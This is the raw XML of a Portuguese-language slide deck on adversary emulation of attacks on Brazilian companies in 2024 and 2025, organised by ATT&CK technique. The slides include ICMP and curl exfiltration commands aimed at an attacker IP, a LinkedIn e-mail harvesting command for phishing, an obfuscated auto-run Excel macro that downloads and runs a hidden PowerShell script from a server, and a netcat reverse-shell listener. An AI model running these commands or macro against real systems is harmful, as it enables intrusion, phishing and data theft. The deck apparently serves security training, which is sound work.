            <a:ext cx="10627500" cy="5782545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763FFD80-65A0-6ADD-0B05-8EECF8D0394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-11992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30690F96-5FA5-002A-5389-1FA02690ADF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72720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2F4420C5-61DC-723F-DDF5-0B786B63CC8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452582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8E4A947B-9409-7B1B-BCF5-920E13B355B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8643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F81FDA6D-7B72-C51A-D29F-A7A9D782577B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874645" y="811491"/>
            <a:ext cx="777831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Exfiltração: Exfiltração via protocolo de rede (T1041)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E691D7DE-9E7C-D6FE-AFB6-EC865EE37D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298662" y="1554532"/>
            <a:ext cx="824210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Enviar os arquivos da máquina alvo para os atacantes (normalmente via C2).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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3F2A44-5930-9499-25C2-FC68D79C64A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298662" y="1904206"/>
            <a:ext cx="8574385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Exfiltração via ICMP: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Máquina atacante: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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sudo</a:t>
            </a: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tcpdump</a:t>
            </a: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-i eth0 -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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teste.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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Máquina vítima: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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xxd</a:t>
            </a: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-p -c 8 /tmp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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text</a:t>
            </a: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/01-exf/new.zip | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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while</a:t>
            </a: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</a:t>
            </a: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</a:t>
            </a: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; do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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ping</a:t>
            </a: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-c 1 -p $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a: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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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IP_atacante</a:t>
            </a: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&gt;; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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done</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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pt-BR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Exfiltração via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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curl</a:t>
            </a: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Máquina atacante: subir um servidor web exposto para internet via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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ngrok</a:t>
            </a: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uma VPS ou algo similar.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Máquina vítima: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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curl</a:t>
            </a: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-X POST -F "file=@arquivo.txt" &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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IP_atacante</a:t>
            </a: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pt-BR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Exfiltração via SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Share</a:t>
            </a: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https://github.com/p0dalirius/DumpSMBShare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR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112214F-A350-892E-3470-E1CF40A7A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8662" y="5588027"/>
            <a:ext cx="9635871" cy="911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4998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4125912D-F654-7358-F3CA-24C72C986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A036D32B-D446-FA68-51C8-C566FB638F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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22F457EC-48E9-A960-2E86-F8873E5D98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253184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B728B14E-E8A1-9136-034B-6A7C3DE3D28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337896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14106771-C606-1489-297F-1592E4E3EAA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717758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56EE2F77-9C7C-E896-DD97-F7C188B365F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8643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3704E690-1F1C-5DFD-B982-C4C0FCFDD68B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="7335626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Ransomware</a:t>
            </a:r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: Criptografia dos dados e extorsão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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30491F6F-FE4C-D081-A436-345DFCA7A258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285841" y="2146532"/>
            <a:ext cx="824210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Criptografar os arquivos e cobrar para descriptografar.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031A821-59EA-D838-5F29-0FE68FD579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480" y="2641215"/>
            <a:ext cx="6629400" cy="360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501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C4772B60-CA3E-7822-C7C9-949D76C81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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3608415A-32BF-79F0-9AFA-675837971539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DA184A70-57FE-F71B-7878-F2188415F11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7996" y="5021943"/>
            <a:ext cx="2955897" cy="1531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43110345-92F7-4DC0-ABFA-FE54566A4B7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386" y="275772"/>
            <a:ext cx="3039959" cy="1574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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2AC6DF3-B0A4-DE7E-EB2C-B966DB3C54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04629" y="1529298"/>
            <a:ext cx="6582741" cy="379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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98238540-D205-081E-4CF8-4F6377AE44A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8512" y="1673141"/>
            <a:ext cx="9114974" cy="359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A9DC80FB-714C-DB3D-F6E9-7D553B9B74F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63494" y="1529298"/>
            <a:ext cx="3662266" cy="61160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7;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{934C0AFE-4571-6646-EAAA-8AAF17AE70C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3044928" y="2364250"/>
            <a:ext cx="6102141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pt-BR" sz="13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lgerian" panose="04020705040A02060702" pitchFamily="82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CASO 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1570975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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B71728-FD71-1E1E-5C38-650CD502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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46939B08-C9E9-D8DB-019D-06D7D353EF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992850" y="762493"/>
            <a:ext cx="8861700" cy="5515429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5" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E085D18-5A82-CAFE-00A6-912C73FF11E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836" y="660309"/>
            <a:ext cx="4460723" cy="25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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749AA129-C0C4-5FB2-F5B8-FD261D05A92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3519" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC55D0BF-CACA-6DDC-61F4-5119D36C236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2968" y="1194537"/>
            <a:ext cx="3430462" cy="86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AA00908B-67D8-F05A-824F-5194ADE2E7C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02968" y="2320534"/>
            <a:ext cx="3302636" cy="55154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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA75631-91C4-A395-2B1D-2F708F32E10B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392951" y="888737"/>
            <a:ext cx="6451525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🏬 Segmento da empresa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none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: I</a:t>
            </a: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ndústria Metalmecânica</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none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👥 </a:t>
            </a:r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Grupo por trás do ataque</a:t>
            </a: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 empresa relatou um “incidente cibernético” sem declarar um ator identificado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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💻</a:t>
            </a:r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que foi comprometido</a:t>
            </a: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Parte dos sistemas internos da companhia ficaram indisponíveis, afetando operações no Brasil e em unidade no México.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empresa isolou sistemas e acionou consultoria externa. Não houve confirmação pública de vazamento de dados de clientes.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companhia não divulgou números públicos de prejuízo ou pagamento de resgate; relatórios indicaram interrupção operacional parcial e ações corretivas, sem números financeiros oficiais.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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648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CD05D582-CA24-CCE6-98AF-165C1EC42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B773CE37-49AC-AA62-8177-323216B691B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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452DB49F-F001-4C74-4C58-A005AC63866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253184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37E413C6-3861-4BDD-1ADB-28064C3A3D0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337896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048A9A7B-2842-8EFC-9294-B5A4EC6C928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717758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794CD367-FE54-9FF2-2939-EA6C302A3A0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8643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ADFE6011-35C1-BB12-57E4-C6EB43233E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Recon</a:t>
            </a:r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: Enumerar e-mails da empresa (T1589)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861CFC41-2F84-D481-EAC6-8B748BC5AA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="1947841"/>
            <a:ext cx="828129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pt-BR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Encontrar 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e-mails válidos para realizar ataques de phishing e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phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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.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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9956991F-DE08-066A-8C4D-53E613D429FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="2426975"/>
            <a:ext cx="8281291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LinkedIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://github.com/l4rm4nd/LinkedInDumper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t>python3 linkedindumper.py --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t> 'https://www.linkedin.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1"/>
              <a:t>company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1"/>
              <a:t>apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t>' --cookie '&lt;cookie&gt;' --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1"/>
              <a:t>email-format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t> '{0}.{1}@apple.de'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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EE83A3B-8561-D258-C01B-F69D7CB8EA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793" y="3499836"/>
            <a:ext cx="5310258" cy="31049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40CFEC3-3C63-F13A-0886-D53288F41F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4647" y="3227876"/>
            <a:ext cx="4547303" cy="3376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7705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D3B443B6-CC7C-89C1-FC1E-91DE26BE5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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3DE0AA-E622-62EF-196E-64E326130026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D58CBB0C-046F-7A73-BF5D-35338BB999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7996" y="5021943"/>
            <a:ext cx="2955897" cy="1531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BB0234B0-EA22-5B66-D2B5-06BAE68F9AC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386" y="275772"/>
            <a:ext cx="3039959" cy="1574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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51E6BF3-183D-B9EC-EA4E-49478C68AF0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04629" y="1529298"/>
            <a:ext cx="6582741" cy="379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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEABF085-07A0-F3D1-DBE8-C651D5EF1AB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8512" y="1673141"/>
            <a:ext cx="9114974" cy="359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17EE80BD-8BE3-FC3A-F62B-640C647C15B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63494" y="1529298"/>
            <a:ext cx="3662266" cy="61160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7;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E65B3DCB-48EF-9BD2-689D-A9BDDFDE27D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991088" y="2828855"/>
            <a:ext cx="629007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pt-BR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lgerian" panose="04020705040A02060702" pitchFamily="82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Emulando Adversários: Mostrando os Principais Ataques que Impactaram Empresas Brasileiras em 2024 e 2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1188763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C15D1B87-48E0-E4AB-2C5F-158C597BC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A58141C6-E75F-B3FD-9D60-C2AA39475DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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E3BA76E6-3E82-5798-B15D-52569EAC1B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253184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7C084790-4C8D-0626-D30F-F8C2CC85D2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337896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6F663457-D8A2-038E-DC33-E2F7E0A8BC5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717758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330D1CE3-5795-2544-38BD-ECD3FE5D1EA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8643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4A3479DB-A233-9D7B-3AA9-FC05F0E443E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7ABD132-77CB-90C8-5345-D3A3F7EB5D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255794" y="2161966"/>
            <a:ext cx="828129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pt-BR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Obter acesso a máquina da vítima via phishing/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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phishing.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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4A2A06F-573D-7264-A47D-85661D012666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="2540788"/>
            <a:ext cx="671663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Subir um servidor web na máquina do atacante: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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D930CB3B-71C7-5F86-9DC8-DBA503C8676F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255794" y="3835731"/>
            <a:ext cx="3897232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Criar uma macro em arquivo de Excel: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56DCD4B-53C0-B2F1-B642-B5A565A431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800" y="4387387"/>
            <a:ext cx="11049173" cy="16693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887380-6755-C518-932D-7EDB7735F8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5808" y="3050107"/>
            <a:ext cx="5257800" cy="485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65863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AF191C55-3D84-834B-2B7B-A3B6113D9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7CA003FD-28B2-4F4C-822D-8F7A624A87D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038350" y="419100"/>
            <a:ext cx="9353600" cy="6362700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6A2B3786-13B9-156D-0BDA-AFE03BB807D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253184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B90195E5-1F9C-122A-350F-9E1CC9F66FA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337896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D8F98D87-EE00-68E7-D2DE-C4149CC3FB9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717758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78D429DC-A085-556E-DE1D-118E1313458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8643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86818125-7009-353E-2D81-E2B005BE36F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000598" y="369055"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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8" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC8A7D3-487D-1AAB-4B58-E7B6619AD12E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038350" y="3319572"/>
            <a:ext cx="220430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3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RevShell</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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5C696A5-A1A5-BBF2-B41A-254350CF9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0943" y="1241233"/>
            <a:ext cx="5487355" cy="5522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3253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75339CC6-C823-4B5A-65F0-5815676E7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36D30B85-55C2-1FF9-4524-3C8E324A04E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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648D93E9-C7C0-843A-180F-9DC528C9B0D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253184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D78691B6-FC6E-817B-E7A8-0B1464EF44D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337896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BEC77E58-3638-6F51-848C-4101C70D9FF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717758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8CE3817F-0B76-E539-ABBE-0F98F7491B5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8643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761A7BED-EB5D-9A39-4A29-EC7EC2E6B454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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8" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FF8902C-9819-A644-7486-ABC0FDF9F295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255794" y="2134534"/>
            <a:ext cx="7992982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Macro:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-B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AutoOpen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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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As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String</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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"p" &amp; "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owers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 &amp; "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hell.ex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 &amp; "e"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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cmd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As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String</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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cmd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" -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NoP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NonI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-W Hidden -Command ""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Invoke-WebRequest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-Uri 'http://172.22.196.126/atualizacao.ps1' -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OutFile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'atualizacao.ps1'; powershell.exe -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ExecutionPolicy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Bypass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-File atualizacao.ps1"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Shell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cmd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vbHide</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Sub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AB19346-F572-DD84-1863-8E39F40EAE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="2819400"/>
            <a:ext cx="7897732" cy="30956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1086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97D42B35-DD56-C16B-E26D-B472729BB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52D51E07-AE42-8D6E-A401-E2FA07C18481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486024" y="1325025"/>
            <a:ext cx="8905925" cy="4694775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DF7D3AE7-B60E-6304-886F-766A022381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253184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5EE2E289-FCB3-684F-A0D0-6D01F0A3269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337896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58E32754-0B4C-AD52-02CB-4381A89D063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717758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59CC2EF3-90A9-12AA-0383-275A74F95FD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8643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3F245244-BFF4-FBDE-780F-D15027A244CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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8" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30024D5A-E8C9-50C3-CF39-6D2FD9FF6CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855993" y="2141095"/>
            <a:ext cx="671663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Abrir uma conexão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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netcat</a:t>
            </a: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na máquina atacante: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sudo</a:t>
            </a:r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nc</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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vnlp</a:t>
            </a:r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443</a:t>
            </a:r>
            <a:endParaRPr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58539D-D00F-D5AF-4A2C-5605745C83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3121" y="3564631"/>
            <a:ext cx="5057775" cy="2076450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E674BE-D437-F891-2302-5495183D4D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855992" y="2991636"/>
            <a:ext cx="671663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Quando a vítima abrir o arquivo e habilitar a macro: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546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223BD225-970E-112D-8D41-895F1AEFF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5CF3F406-BF85-00D4-DAD2-45BF9233E02A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762124" y="337896"/>
            <a:ext cx="9629825" cy="6331617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B7FB3F57-1ACE-1BEC-A6E6-B4C95A650E0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-204016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31BFEEDE-6936-BE7C-B395-5B8E37F2024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-119304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F5C516CE-3586-090B-2B88-75C0D75F723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260558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77DE6B06-9A31-D27A-5F13-BBF09393DDA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8643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F9CCDFDE-F8C4-1E26-7308-6F55510ABD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000598" y="256108"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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975F96D-0682-E431-B77B-B705A609A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0058" y="1085850"/>
            <a:ext cx="7875616" cy="5511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7755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72E85978-41DC-C925-C6AF-6AE1164D7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70FE2994-5A20-D66B-7403-8A6E90CEB87C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1152145"/>
